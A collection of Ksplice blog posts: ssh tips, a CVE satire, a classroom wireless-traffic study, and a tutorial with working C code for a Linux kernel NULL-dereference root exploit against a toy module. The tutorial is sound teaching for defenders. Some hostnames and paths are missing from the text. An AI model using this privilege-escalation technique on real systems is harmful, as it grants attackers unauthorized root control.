Because the tilde is ssh's escape character. Right after a newline, you can type ~ and a number of other keystrokes to do interesting things to your ssh connection (like give you 30 extra lives in each continue.) ~? will display a full list of the escape sequences, but two handy ones are ~. and ~^Z.

~. (a tilde followed by a period) will terminate the ssh connection, which is handy if you lose your network connection and don't want to wait for your ssh session to time out. ~^Z (a tilde followed by Ctrl-Z) will put the connection in the background, in case you want to do something else on your local machine while ssh is running. An example of this in action:

wdaher@rocksteady:~$ ssh bebop
wdaher@bebop:~$ sleep 10000
wdaher@bebop:~$ ~^Z [suspend ssh]

[1]+  Stopped                 ssh bebop
wdaher@rocksteady:~$ # Do something else
wdaher@rocksteady:~$ fg # and you're back!

(4) Dusting for prints

I'm sure you've seen this a million times, and you probably just type "yes" without thinking twice:

wdaher@rocksteady:~$ ssh bebop
The authenticity of host 'bebop (' can't be established.
RSA key fingerprint is a2:6d:2f:30:a3:d3:12:9d:9d:da:0c:a7:a4:60:20:68.
Are you sure you want to continue connecting (yes/no)?

What's actually going on here? Well, if this is your first time connecting to bebop, you can't really tell whether the machine you're talking to is actually bebop, or just an impostor pretending to be bebop. All you know is the key fingerprint of the system you're talking to.  In principle, you're supposed to verify this out-of-band (i.e. call up the remote host and ask them to read off the fingerprint.)

Let's say you and your incredibly security-minded friend actually want to do this. How does one actually find this fingerprint? On the remote host, have your friend run:

sbaker@bebop:~$ ssh-keygen -l -f /etc/ssh/
2048 a2:6d:2f:30:a3:d3:12:9d:9d:da:0c:a7:a4:60:20:68 /etc/ssh/ (RSA)

Tada! They match, and it's safe to proceed. From now on, this is stored in your list of ssh "known hosts" (in ~/.ssh/known_hosts), so you don't get the prompt every time. And if the key ever changes on the other end, you'll get an alert--someone's trying to read your traffic! (Or your friend reinstalled their system and didn't preserve the key.)
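For the curious: the colon-separated fingerprint shown here is simply an MD5 hash of the decoded public key blob. Below is a minimal Python sketch of that calculation. The key material is made up for illustration, and md5_fingerprint is a hypothetical helper name, not part of OpenSSH. Newer OpenSSH releases print SHA256 fingerprints by default, so treat this as a sketch of the older format used in this post.

```python
import base64
import hashlib


def md5_fingerprint(public_key_line: str) -> str:
    """Return the colon-separated MD5 fingerprint of an OpenSSH public key line."""
    # A public key line looks like: "<key-type> <base64-blob> [comment]".
    blob_b64 = public_key_line.split()[1]
    blob = base64.b64decode(blob_b64)
    digest = hashlib.md5(blob).hexdigest()
    # Group the 32 hex digits into 16 colon-separated byte pairs.
    return ":".join(digest[i:i + 2] for i in range(0, len(digest), 2))


# Hypothetical key material, for illustration only (not a real host key).
example_line = "ssh-rsa " + base64.b64encode(b"not a real key").decode() + " bebop"
print(md5_fingerprint(example_line))
```

If the value printed for the real host key file matches what ssh showed you at the prompt, you are looking at the same key.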

(5) Losing your keys

Unfortunately, some time later, you and your friend have a falling out (something about Kirk vs. Picard), and you want to remove their key from your known hosts. "No problem," you think, "I'll just remove it from my list of known hosts." You open up the file and are unpleasantly surprised: a jumbled file full of all kinds of indecipherable characters. They're actually hashes of the hostnames (or IP addresses) that you've connected to before, and their associated keys.

Before you proceed, surely you're asking yourself: "Why would anyone be so cruel? Why not just list the hostnames in plain text, so that humans could easily edit the file?" In fact, that's actually how it was done until very recently. But it turns out that leaving them in the clear is a potential security risk, since it provides an attacker a convenient list of other places you've connected (places where, e.g., an unwitting user might have used the same password).

Fortunately, ssh-keygen -R <hostname> does the trick:

wdaher@rocksteady:~$ ssh-keygen -R bebop
/home/wdaher/.ssh/known_hosts updated.
Original contents retained as /home/wdaher/.ssh/known_hosts.old

I'm told there's still no easy way to remove now-bitter memories of your friendship together, though.
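If you're wondering what those hashed entries actually contain: each hashed host field has the form |1|salt|hash, where salt is base64-encoded random bytes and hash is the base64-encoded HMAC-SHA1 of the hostname, keyed with the salt. The Python sketch below shows how a candidate hostname can be checked against such a field. The helper names hash_host and entry_matches are my own, and the salt is generated on the spot rather than taken from a real known_hosts file.

```python
import base64
import hashlib
import hmac
import os


def hash_host(hostname: str, salt: bytes) -> str:
    """Build a hashed host field: |1|base64(salt)|base64(HMAC-SHA1(salt, hostname))."""
    mac = hmac.new(salt, hostname.encode(), hashlib.sha1).digest()
    return "|1|{}|{}".format(base64.b64encode(salt).decode(),
                             base64.b64encode(mac).decode())


def entry_matches(hashed_field: str, hostname: str) -> bool:
    """Check whether a hashed host field corresponds to the given hostname."""
    _, magic, salt_b64, mac_b64 = hashed_field.split("|")
    if magic != "1":
        return False
    salt = base64.b64decode(salt_b64)
    expected = hmac.new(salt, hostname.encode(), hashlib.sha1).digest()
    return hmac.compare_digest(expected, base64.b64decode(mac_b64))


# Illustration with a random salt; real entries carry their own salt.
field = hash_host("bebop", os.urandom(20))
print(entry_matches(field, "bebop"), entry_matches(field, "rocksteady"))
```

This is why you can still ask "is bebop in this file?" but cannot simply read off the list of hosts.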

(6) A connection by any other name...

If you've read this far, you're an ssh pro. And like any ssh pro, you log into a bajillion systems, each with their own usernames, ports, and long hostnames. Like your accounts at AWS, Rackspace Cloud, your dedicated server, and your friend's home system.

And you already know how to do this. username@host or -l username to specify your username, and -p portnumber to specify the port:

wdaher@rocksteady:~$ ssh -p 2222
wdaher@rocksteady:~$ ssh -p 8183
wdaher@rocksteady:~$ ssh -p 31337 -l waseemio

But this gets really old really quickly, especially when you need to pass a slew of other options for each of these connections. Enter .ssh/config, a file where you specify convenient aliases for each of these sets of settings:

Host bob
    Port 2222
    User wdaher

Host alice
    Port 8183
    User waseem

Host self
    Port 31337
    User waseemio

So now it's as simple as:

wdaher@rocksteady:~$ ssh bob
wdaher@rocksteady:~$ ssh alice
wdaher@rocksteady:~$ ssh self

And yes, the config file lets you specify port forwards or commands to run as well, if you'd like--check out the ssh_config manual page for the details.

ssh! It's (not) a secret

This list is by no means exhaustive, so I turn to you: what other ssh tips and tricks have you learned over the years? Leave ’em in the comments!


Wednesday Jun 30, 2010

Let's Play Vulnerability Bingo!

Dear Fellow System Administrators,

I like excitement in my life. I go on roller coasters, I ride my bike without a helmet, I make risky financial decisions. I treat my servers no differently. When my Linux vendor releases security updates, I think: I could apply these patches, but why would I? If I did, I'd have to coordinate with my users to schedule a maintenance window for 2am on a Sunday and babysit those systems while they reboot, which is seriously annoying, hurts our availability, and interrupts my beauty sleep (and trust me, I need my beauty sleep). Plus, where's the fun in having a fully-patched system? Without open vulnerabilities, how else would I have won a ton of money in my office's Vulnerability Bingo games?

vulnerability bingo card

How can I get in on some Vulnerability Bingo action, you ask? Simple: get yourself some bingo cards, be sure not to patch your systems, and place chips on appropriate squares when your machines are compromised. Or, as a fun variant, place chips when your friends' machines get compromised! For the less adventurous, place chips as relevant Common Vulnerabilities and Exposures are announced.

What's really great is the diversity of vulnerabilities. In 2009 alone, Vulnerability Bingo featured:

physically proximate denial of service attacks (CVE-2009-1046).

local denial of service attacks (CVE-2009-0322, CVE-2009-0031, CVE-2009-0269, CVE-2009-1242, CVE-2009-2406, CVE-2009-2407, CVE-2009-2287, CVE-2009-2692, CVE-2009-2909, CVE-2009-2908, CVE-2009-3290, CVE-2009-3547, CVE-2009-3621, CVE-2009-3620) coming in at least 5 great flavors: faults, memory corruption, system crashes, hangs, and the kernel OOPS!

And the perennial favorite, remote denial of service attacks (CVE-2009-1439, CVE-2009-1633, CVE-2009-3613, CVE-2009-2903) including but not limited to system crashes, IOMMU space exhaustion, and memory consumption!

How about leaking potentially sensitive information from kernel memory (CVE-2009-0676, CVE-2009-3002, CVE-2009-3612, CVE-2009-3228) and remote access to potentially sensitive information from kernel memory (CVE-2009-1265)?

Perhaps I can interest you in some privilege escalation (CVE-2009-2406, CVE-2009-2407, CVE-2009-2692, CVE-2009-3547, CVE-2009-3620), or my personal favorites, arbitrary code execution (CVE-2009-2908) and unknown impact (CVE-2009-0065, CVE-2009-1633, CVE-2009-3638).

Sometimes you get a triple threat like CVE-2009-1895, which "makes it easier for local users to leverage the details of memory usage to (1) conduct NULL pointer dereference attacks, (2) bypass the mmap_min_addr protection mechanism, or (3) defeat address space layout randomization (ASLR)". Three great tastes that taste great together -- and a great multi-play Bingo opportunity!

Linux vendors release kernel security updates almost every month (take Red Hat for example), so generate some cards and get in on the action before you miss the next round of exciting CVEs!

Happy Hacking,

Ben Bitdiddle
System Administrator
HackMe Inc.


Wednesday May 19, 2010

The wireless traffic of MIT students

Wireless traffic is both interesting and delightfully accessible thanks to the broadcast nature of 802.11. I have spent many a lazy weekend afternoon watching my laptop, the Tivo, and the router chatting away in a Wireshark window.

As fun as the wireless traffic in one's house may be, there's something to be said for being able to observe a much larger ecosystem - one with more people with a more diverse set of operating systems, browsers, and intentions as they work on their wireless-enabled devices, giving rise to more interesting background and active traffic patterns and a greater set of protocols in play.

Now, it happens to be the case that sniffing other people's wireless traffic breaks a number of federal and local laws, including wiretapping laws, and while I am interested in observing other people's wireless traffic, I'm not interested in breaking the law. Fortunately, Ksplice is down the road from a wonderful school that fosters this kind of intellectual curiosity.

I met with MIT's Information Services and Technology Security Team, and we came up with a plan for me to gather data that would satisfy MIT's Athena Rules of Use. I got permission from Robert Morris and Sam Madden to monitor the wireless traffic during their Computer Systems Engineering class and made an announcement at the beginning of a class period explaining what I'd be doing. Somewhat ironically, that day's lecture was an introduction to computer security.

Some interesting results from the data set collected are summarized below. Traffic was gathered with tcpdump on my laptop as I sat in the middle of the classroom. The data was imported into Wireshark, spit back out as a CSV, and imported into a sqlite database for aggregation queries, read back into tcpdump and filtered there, or hacked up with judicious use of grep, as different needs arose.

Protocol        # Packets   % Packets
MDNS            259932      30.46
TCP             245268      28.74
ICMPv6          116167      13.61
TPKT            78311       9.18
SSDP            31441       3.68
HTTP            28027       3.28
UDP             17006       1.99
LLMNR           16991       1.99
TLSv1           14390       1.69
DHCPv6          11572       1.36
DNS             10870       1.27
SSH             8804        1.03
SSLv3           3094        0.36
Jabber          2507        0.29
ARP             2003        0.23
SSHv2           1503        0.18
IGMP            1309        0.15
SNMP            1232        0.14
NBNS            619         0.073
WLCCP           513         0.060
AIM Buddylist   265         0.031
NTP             245         0.029
HTTP/XML        218         0.026
MSNMS           192         0.022
IP              139         0.016
AIM             121         0.014
SSL             105         0.012
IPv6            90          0.011
AIM Generic     84          0.0098
DHCP            64          0.0075
ICMP            60          0.0070
X.224           59          0.0069
AIM SST         45          0.0053
AIM Messaging   39          0.0046
BROWSER         37          0.0043
YMSG            35          0.0041
AARP            18          0.0021
OCSP            16          0.0019
AIM SSI         11          0.0013
SSLv2           8           0.00094
T.125           5           0.00059
AIM Signon      4           0.00047
NBP             4           0.00047
AIM BOS         3           0.00035
AIM ChatNav     3           0.00035
AIM Stats       3           0.00035
AIM Location    2           0.00023
ZIP             2           0.00023

Basic statistics
Time spent capturing: 45 minutes
Packets captured: 853436
Number of traffic sources in the room: 21
Number of distinct source and destination IPv4 and IPv6 addresses: 5117
Number of "active" traffic addresses (e.g., using HTTP or SSH, not background traffic): 581
Number of protocols represented: 48 (note that Wireshark buckets based on the top layer for a packet, so for example TCP is in this count because someone was sending actual TCP traffic without an application layer on top and not because TCP is the transport protocol for HTTP, which is also in this count). These protocols and how much traffic was sent over them are in the table above.
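A per-protocol breakdown like the one in the table can be produced with a single aggregation query once the CSV export is in sqlite. The sketch below is an illustration rather than the exact queries used for this post: the column names Source, Destination, and Protocol are assumed to match the CSV header, the sample rows are made up, and protocol_counts is a hypothetical helper.

```python
import csv
import io
import sqlite3


def protocol_counts(csv_text: str):
    """Load packet rows into an in-memory SQLite table and count packets per protocol."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE packets (source TEXT, destination TEXT, protocol TEXT)")
    reader = csv.DictReader(io.StringIO(csv_text))
    conn.executemany(
        "INSERT INTO packets VALUES (?, ?, ?)",
        ((row["Source"], row["Destination"], row["Protocol"]) for row in reader),
    )
    total = conn.execute("SELECT COUNT(*) FROM packets").fetchone()[0]
    rows = conn.execute(
        "SELECT protocol, COUNT(*) AS n FROM packets "
        "GROUP BY protocol ORDER BY n DESC, protocol"
    ).fetchall()
    conn.close()
    # Each result row is (protocol, packet count, percentage of all packets).
    return [(proto, n, round(100.0 * n / total, 2)) for proto, n in rows]


# Tiny made-up sample; the addresses are documentation placeholders.
sample = """Source,Destination,Protocol
192.0.2.1,224.0.0.251,MDNS
192.0.2.2,224.0.0.251,MDNS
192.0.2.1,192.0.2.9,TCP
192.0.2.3,192.0.2.9,HTTP
"""
for proto, n, pct in protocol_counts(sample):
    print(proto, n, pct)
```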

IPv4 v. IPv6
Number of IPv4 packets: 580547
Number of IPv6 packets: 270351

2.15 IPv4 packets were sent for every IPv6 packet. IPv6 was only used for background traffic, serving as the internet layer for the following protocols: DHCPv6, DNS, ICMPv6, LLMNR, MDNS, SSDP, TCP, and UDP. The TCP over IPv6 packets were all icslap, ldap, or wsdapi communications between our Windows user discussed below and his or her remote desktop. The UDP over IPv6 packets were all ws-discovery communications, part of a local multicast discovery protocol most likely being used by the Windows machines in the room.

Number of ICMP packets: 60
Number of ICMPv6 packets: 116167

1936.12 ICMPv6 packets were sent for every ICMP packet. The reason is that ICMPv6 is doing IPv6 work that is taken care of by other link layer protocols in IPv4. Looking at the ICMP and ICMPv6 packets by type:

ICMP Type/Code                                       Pkts
Dest unreachable (Host administratively prohibited)  1
Dest unreachable (Port unreachable)                  35
Echo (ping) request                                  9
Time-to-live exceeded in transit                     15

ICMPv6 Type/Code                  Pkts
Echo request                      8
Multicast Listener Report msg v2  7236
Multicast listener done           86
Multicast listener report         548
Neighbor advertisement            806
Neighbor solicitation             105710
Redirect                          353
Router advertisement              461
Router solicitation               956
Time exceeded (In-transit)        1
Unknown (0x40) (Unknown (0x87))   1
Unreachable (Port unreachable)    1

These ICMPv6 packets are mostly doing Neighbor Discovery Protocol (NDP) and Multicast Listener Discovery (MLD) work. NDP handles router and neighbor solicitation and is similar to ARP and ICMP under IPv4, and MLD handles multicast listener discovery similar to IGMP under IPv4.
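To put numbers on "mostly", here is a small Python sketch that groups the ICMPv6 counts from the table into NDP and MLD and works out their shares. The grouping is my own reading of which message types belong to which protocol (router and neighbor solicitation/advertisement plus Redirect for NDP, the listener report and done messages for MLD).

```python
# ICMPv6 packet counts by type, copied from the table above.
icmpv6 = {
    "Echo request": 8,
    "Multicast Listener Report msg v2": 7236,
    "Multicast listener done": 86,
    "Multicast listener report": 548,
    "Neighbor advertisement": 806,
    "Neighbor solicitation": 105710,
    "Redirect": 353,
    "Router advertisement": 461,
    "Router solicitation": 956,
    "Time exceeded (In-transit)": 1,
    "Unknown (0x40) (Unknown (0x87))": 1,
    "Unreachable (Port unreachable)": 1,
}

NDP_TYPES = {"Neighbor advertisement", "Neighbor solicitation", "Redirect",
             "Router advertisement", "Router solicitation"}
MLD_TYPES = {"Multicast Listener Report msg v2", "Multicast listener done",
             "Multicast listener report"}

total = sum(icmpv6.values())
ndp = sum(n for name, n in icmpv6.items() if name in NDP_TYPES)
mld = sum(n for name, n in icmpv6.items() if name in MLD_TYPES)

ndp_pct = round(100 * ndp / total, 1)
mld_pct = round(100 * mld / total, 1)
print(total, ndp, ndp_pct, mld, mld_pct)
```

By this grouping NDP accounts for roughly 93% of the ICMPv6 packets and MLD for roughly 7%, with neighbor solicitations alone making up the bulk of the NDP traffic.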

Number of TCP packets: 383122
Number of UDP packets: 350067

1.09 TCP packets were sent for every UDP packet. I would have thought TCP would be a clear winner, but given that MDNS traffic, which is over UDP, makes up over 30% of the packets captured, I guess this isn't surprising. The 14% of packets unaccounted for at the transport layer are mostly ICMPv6, along with some ARP, IGMP, and ICMP traffic. See also this post.
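The ratios quoted in this section are easy to re-derive from the raw packet counts. A quick Python sketch, using only the numbers given in this post:

```python
# Packet counts quoted in this post.
total_packets = 853436
ipv4, ipv6 = 580547, 270351
icmp, icmpv6 = 60, 116167
tcp, udp = 383122, 350067

ipv4_per_ipv6 = round(ipv4 / ipv6, 2)
icmpv6_per_icmp = round(icmpv6 / icmp, 2)
tcp_per_udp = round(tcp / udp, 2)

# Packets that are neither TCP nor UDP at the transport layer.
other = total_packets - tcp - udp
other_pct = round(100 * other / total_packets, 1)

print(ipv4_per_ipv6, icmpv6_per_icmp, tcp_per_udp, other, other_pct)
```

This gives 2.15, 1936.12, and 1.09 for the three ratios, and 120247 packets (about 14%) that are neither TCP nor UDP.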

Instant Messaging

Awesomely, AIM, Jabber, MSN Messenger, and Yahoo! Messenger were all represented in the traffic:

Protocol  Participants  # Packets
AIM       22            580
Jabber    6             2507
YMSG      4             35
MSNMS     3             192

AIM is the clear favorite (at least with this small sample size). Note that Jabber has about 1/4th the AIM participants but 4x the number of packets. Either the Jabberers are extra chatty, or the fact that Jabber is an XML-based protocol inflates the size of a conversation dramatically on the wire. Note that some IM traffic (like Google Chat) might have instead been bucketed as HTTP/XML by Wireshark.
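Dividing packets by participants makes the Jabber observation more concrete. A small Python sketch using the counts from the table (nothing here is new data):

```python
# (participants, packets) per IM protocol, from the table above.
im = {"AIM": (22, 580), "Jabber": (6, 2507), "YMSG": (4, 35), "MSNMS": (3, 192)}

# Average number of packets sent per participant for each protocol.
per_participant = {name: round(pkts / people, 1) for name, (people, pkts) in im.items()}

# How many times more packets a Jabber participant generated than an AIM one.
jabber_vs_aim = round((2507 / 6) / (580 / 22), 1)

print(per_participant["AIM"], per_participant["Jabber"], jabber_vs_aim)
```

That works out to about 26 packets per AIM participant versus about 418 per Jabber participant, a difference of roughly 16x.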

That Windows Remote Desktop Person

119489 packets, or 14% of the traffic, were between a computer in the classroom and what is with high probability a Windows machine on campus running the Microsoft Remote Desktop Protocol (see also this support page for a discussion of the protocol specifics).

RDP traffic from client to remote desktop: T.125, TCP, TPKT, X.224
RDP traffic from remote desktop to client: TCP, TPKT

Most of the traffic is T.125 payload packets. TPKTs encapsulate transport protocol data units (TPDUs) in the ISO Transport Service on top of TCP. TPKT traffic was all "Continuation" traffic. X.224 transmits status and error codes. TCP "ms-wbt-server" traffic to port 3389 on the remote machine seals the deal on this being an RDP setup.


All SSH and SSHv2 traffic was to Linerva, a public-access Linux server run by SIPB for the MIT community, except for one person talking to a personal server on campus.

Protocol  # Packets  % Packets
TLSv1     14390      81.8
SSLv3     3094       17.6
SSL       105        0.59
SSLv2     8          0.045

5 clients attempted SSLv2 negotiations. SSLv2 is insecure and disabled by default in most browsers, and none of these negotiations got past a "Client Hello".


I wanted to be able to answer questions like "what were the top 20 most visited websites" in this traffic capture. The proliferation of content distribution networks makes it harder to track all traffic associated with a popular website by IP addresses or hostnames. I ended up doing a crude but quick grep "Host:" pcap.plaintext | sort | uniq -c | sort -n -r on the expanded plaintext version of the data exported from Wireshark, which gives the most visited hosts based on the number of GET requests. The top 20 most visited hosts by that method were:

Rank GETs Host Rank GETs Host
1 336 11 88
2 229 12 87
3 211 13 66
4 167 14 66
5 149 15 64
6 114 16 61
7 113 17 57
8 111 18 56
9 93 19 56
10 90 20 55

Alas, pretty boring. The blogcdn, blogsmith and eyewonder hosts are all for Engadget, and fbcdn is part of Facebook. I'll admit that I'd been a little hopeful that some enterprising student would try to screw up my data by scripting visits to a bunch of porn sites or something. CDNs dominate the top 20, and in fact almost all of the roughly 410 web server IP addresses gathered are for CDNs. Akamai led with 39 distinct IPs, followed by Amazon AWS with 23, and Facebook and Panther CDN with 16, with many more at lower numbers.
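The host tally came from the grep | sort | uniq -c | sort pipeline described earlier. A rough Python equivalent is sketched below. It is not identical to the pipeline: it extracts and lowercases the value after "Host:" instead of counting identical lines. The function name top_hosts and the sample hosts are made up for illustration.

```python
import re
from collections import Counter

HOST_LINE = re.compile(r"Host:\s*(\S+)")


def top_hosts(plaintext: str, n: int = 20):
    """Count 'Host:' header values in a plaintext dump and return the n most common."""
    counts = Counter()
    for line in plaintext.splitlines():
        match = HOST_LINE.search(line)
        if match:
            counts[match.group(1).lower()] += 1
    return counts.most_common(n)


# Made-up sample standing in for the exported plaintext capture.
sample = """GET / HTTP/1.1
Host: www.example.com
GET /a HTTP/1.1
Host: cdn.example.net
GET /b HTTP/1.1
Host: www.example.com
"""
print(top_hosts(sample, 2))
```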


Using the Internet means a lot more than HTTP traffic! 45 minutes of traffic capture gave us 48 protocols to explore. Most of the captured traffic was background traffic, and in particular discovery traffic local to the subnet.

Sniffing wireless traffic (legally) is a great way to learn about networking protocols and the way the Internet works in practice. It can also be incredibly useful for debugging networking problems.

What are some of your fun or awful networking experiences?


Monday Apr 12, 2010

Much ado about NULL: Exploiting a kernel NULL dereference

Last time, we took a brief look at virtual memory and what a NULL pointer really means, as well as how we can use the mmap(2) function to map the NULL page so that we can safely use a NULL pointer. We think that it's important for developers and system administrators to be more knowledgeable about the attacks that black hats regularly use to take control of systems, and so, today, we're going to start from where we left off and go all the way to a working exploit for a NULL pointer dereference in a toy kernel module.

A quick note: For the sake of simplicity, concreteness, and conciseness, this post, as well as the previous one, assumes Intel x86 hardware throughout. Most of the discussion should be applicable elsewhere, but I don't promise any of the details are the same.


In order to allow you to play along at home, I've prepared a trivial kernel module that will deliberately cause a NULL pointer dereference, so that you don't have to find a new exploit or run a known buggy kernel to get a NULL dereference to play with. I'd encourage you to download the source and follow along. If you're not familiar with building kernel modules, there are simple directions in the README. The module should work on just about any Linux kernel since 2.6.11.

Don't run this on a machine you care about – it's deliberately buggy code, and will easily crash or destabilize the entire machine. If you want to follow along, I recommend spinning up a virtual machine for testing.

While we'll be using this test module for demonstration, a real exploit would instead be based on a NULL pointer dereference somewhere in the core kernel (such as last year's sock_sendpage vulnerability), which would allow an attacker to trigger a NULL pointer dereference -- much like the one this toy module triggers -- without having to load a module of their own or be root.

If we build and load the nullderef module, and execute

echo 1 > /sys/kernel/debug/nullderef/null_read

our shell will crash, and we'll see something like the following on the console (on a physical console, out a serial port, or in dmesg):

BUG: unable to handle kernel NULL pointer dereference at 00000000

IP: [<c5821001>] null_read_write+0x1/0x10 [nullderef]

The kernel address space

We saw last time that we can map the NULL page in our own application. How does this help us with kernel NULL dereferences? Surely, if every application has its own address space and set of addresses, the core operating system itself must also have its own address space, where it and all of its code and data live, and mere user programs can't mess with it?

For various reasons, that's not quite how it works. It turns out that switching between address spaces is relatively expensive, and so to save on switching address spaces, the kernel is actually mapped into every process's address space, and the kernel just runs in the address space of whichever process was last executing.

In order to prevent any random program from scribbling all over the kernel, the operating system makes use of a feature of the x86's virtual memory architecture called memory protection. At any moment, the processor knows whether it is executing code in user (unprivileged) mode or in kernel mode. In addition, every page in the virtual memory layout has a flag on it that specifies whether or not user code is allowed to access it. The OS can thus arrange things so that program code only ever runs in "user" mode, and configures virtual memory so that only code executing in "kernel" mode is allowed to read or write certain addresses. For instance, on most 32-bit Linux machines, in any process, the address 0xc0100000 refers to the start of the kernel's memory – but normal user code is not allowed to read or write it.

A diagram of virtual memory and memory protection

Since we have to prevent user code from arbitrarily changing privilege levels, how do we get into kernel mode? The answer is that there is a set of entry points in the kernel that expect to be callable from unprivileged code. The kernel registers these with the hardware, and the hardware has instructions that both switch to one of these entry points and change to kernel mode. For our purposes, the most relevant entry point is the system call handler. System calls are how programs ask the kernel to do things for them. For example, if a program wants to write to a file, it prepares a file descriptor referring to the file and a buffer containing the data to write. It places them in a specified location (usually in certain registers), along with the number referring to the write(2) system call, and then it triggers one of those entry points. The system call handler in the kernel then decodes the arguments, does the write, and returns to the calling program.

This all has at least two important consequences for exploiting NULL pointer dereferences:

First, since the kernel runs in the address space of a userspace process, we can map a page at NULL and control what data a NULL pointer dereference in the kernel sees, just like we could for our own process!

Secondly, if we do somehow manage to get code executing in kernel mode, we don't need to do any trickery at all to get at the kernel's data structures. They're all there in our address space, protected only by the fact that we're not normally able to run code in kernel mode.

We can demonstrate the first fact with the following program, which writes to the null_read file to force a kernel NULL dereference, but with the NULL page mapped, so that nothing goes wrong:

(As in part I, you'll need to echo 0 > /proc/sys/vm/mmap_min_addr as root before trying this on any recent distribution's kernel. While mmap_min_addr does provide some protection against these exploits, attackers have in the past found numerous ways around this restriction. In a real exploit, an attacker would use one of those or find a new one, but for demonstration purposes it's easier to just turn it off as root.)

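#include <sys/mman.h>
#include <stdio.h>
#include <fcntl.h>
#include <unistd.h>

int main() {
  /* Map one page at address 0 so the kernel's NULL read finds valid memory */
  mmap(0, 4096, PROT_READ|PROT_WRITE,
       MAP_PRIVATE|MAP_ANONYMOUS|MAP_FIXED, -1, 0);
  int fd = open("/sys/kernel/debug/nullderef/null_read", O_WRONLY);
  write(fd, "1", 1);
  close(fd);

  printf("Triggered a kernel NULL pointer dereference!\n");
  return 0;
}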

Writing to that file will trigger a NULL pointer dereference by the nullderef kernel module, but because it runs in the same address space as the user process, the read proceeds fine and nothing goes wrong – no kernel oops. We've passed the first step to a working exploit.

Putting it together

To put it all together, we'll use the other file that nullderef exports, null_call. Writing to that file causes the module to read a function pointer from address 0, and then call through it. Since the Linux kernel uses function pointers essentially everywhere throughout its source, it's quite common that a NULL pointer dereference is, or can be easily turned into, a NULL function pointer dereference, so this is not totally unrealistic.

So, if we just drop a function pointer of our own at address 0, the kernel will call that function pointer in kernel mode, and suddenly we're executing our code in kernel mode, and we can do whatever we want to kernel memory.

We could do anything we want with this access, but for now, we'll stick to just getting root privileges. In order to do so, we'll make use of two built-in kernel functions, prepare_kernel_cred and commit_creds. (We'll get their addresses out of the /proc/kallsyms file, which, as its name suggests, lists all kernel symbols with their addresses.)

struct cred is the basic unit of "credentials" that the kernel uses to keep track of what permissions a process has – what user it's running as, what groups it's in, any extra credentials it's been granted, and so on. prepare_kernel_cred will allocate and return a new struct cred with full privileges, intended for use by in-kernel daemons. commit_creds will then take the provided struct cred, and apply it to the current process, thereby giving us full permissions.
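As an aside on the file format: each line of /proc/kallsyms is a hex address, a one-letter symbol type, and the symbol name (plus a module name for module symbols). Here is a minimal Python sketch of looking a symbol up in text of that shape. The addresses are made up, find_symbol is a hypothetical helper, and on many newer kernels unprivileged users see zeroed addresses in this file, so don't expect real values without root.

```python
def find_symbol(kallsyms_text: str, name: str):
    """Return the address of `name` from /proc/kallsyms-style text, or None."""
    for line in kallsyms_text.splitlines():
        fields = line.split()
        # Each line is "<hex address> <type letter> <symbol name> [module]".
        if len(fields) >= 3 and fields[2] == name:
            return int(fields[0], 16)
    return None


# Made-up addresses for illustration; real values differ on every kernel build.
sample = """c0100000 T _text
c0148e70 T prepare_kernel_cred
c0148c90 T commit_creds
"""
print(hex(find_symbol(sample, "commit_creds")))
```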

Putting it together, we get:

#include <sys/mman.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <fcntl.h>
#include <unistd.h>

struct cred;
struct task_struct;

/* 32-bit x86 kernels pass arguments in registers, hence regparm(3) */
typedef struct cred *(*prepare_kernel_cred_t)(struct task_struct *daemon)
  __attribute__((regparm(3)));
typedef int (*commit_creds_t)(struct cred *new)
  __attribute__((regparm(3)));

prepare_kernel_cred_t prepare_kernel_cred;
commit_creds_t commit_creds;

/* Find a kernel symbol in /proc/kallsyms */
void *get_ksym(char *name) {
    FILE *f = fopen("/proc/kallsyms", "rb");
    char c, sym[512];
    void *addr;

    if (!f)
        return NULL;
    while (fscanf(f, "%p %c %511s\n", &addr, &c, sym) == 3) {
        if (!strcmp(sym, name)) {
            fclose(f);
            return addr;
        }
    }
    fclose(f);
    return NULL;
}

/* This function will be executed in kernel mode. */
void get_root(void) {
    commit_creds(prepare_kernel_cred(0));
}

int main() {
  prepare_kernel_cred = get_ksym("prepare_kernel_cred");
  commit_creds        = get_ksym("commit_creds");

  if (!(prepare_kernel_cred && commit_creds)) {
      fprintf(stderr, "Kernel symbols not found. "
                      "Is your kernel older than 2.6.29?\n");
      return 1;
  }

  /* Put a pointer to our function at NULL */
  mmap(0, 4096, PROT_READ|PROT_WRITE,
       MAP_PRIVATE|MAP_ANONYMOUS|MAP_FIXED, -1, 0);
  void (**fn)(void) = NULL;
  *fn = get_root;

  /* Trigger the kernel */
  int fd = open("/sys/kernel/debug/nullderef/null_call", O_WRONLY);
  write(fd, "1", 1);
  close(fd);

  if (getuid() == 0) {
      char *argv[] = {"/bin/sh", NULL};
      execve("/bin/sh", argv, NULL);
  }

  fprintf(stderr, "Something went wrong?\n");
  return 1;
}

(struct cred is new as of kernel 2.6.29, so for older kernels, you'll need to use this version, which uses an old trick based on pattern-matching to find the location of the current process's user id. Drop me an email or ask in a comment if you're curious about the details.)

So, that's really all there is. A "production-strength" exploit might add lots of bells and whistles, but there'd be nothing fundamentally different. mmap_min_addr offers some protection, but crackers and security researchers have found ways around it many times before. It's possible the kernel developers have fixed it for good this time, but I wouldn't bet on it.


One last note: Nothing in this post is a new technique or news to exploit authors. Every technique described here has been in active use for years. This post is intended to educate developers and system administrators about the attacks that are in regular use in the wild.


Tired of rebooting to update systems? So are we -- which is why we invented Ksplice, technology that lets you update the Linux kernel without rebooting. It's currently available as part of Oracle Linux Premier Support, Fedora, and Ubuntu desktop. This blog is our place to ramble about technical topics that we (and hopefully you) think are interesting.

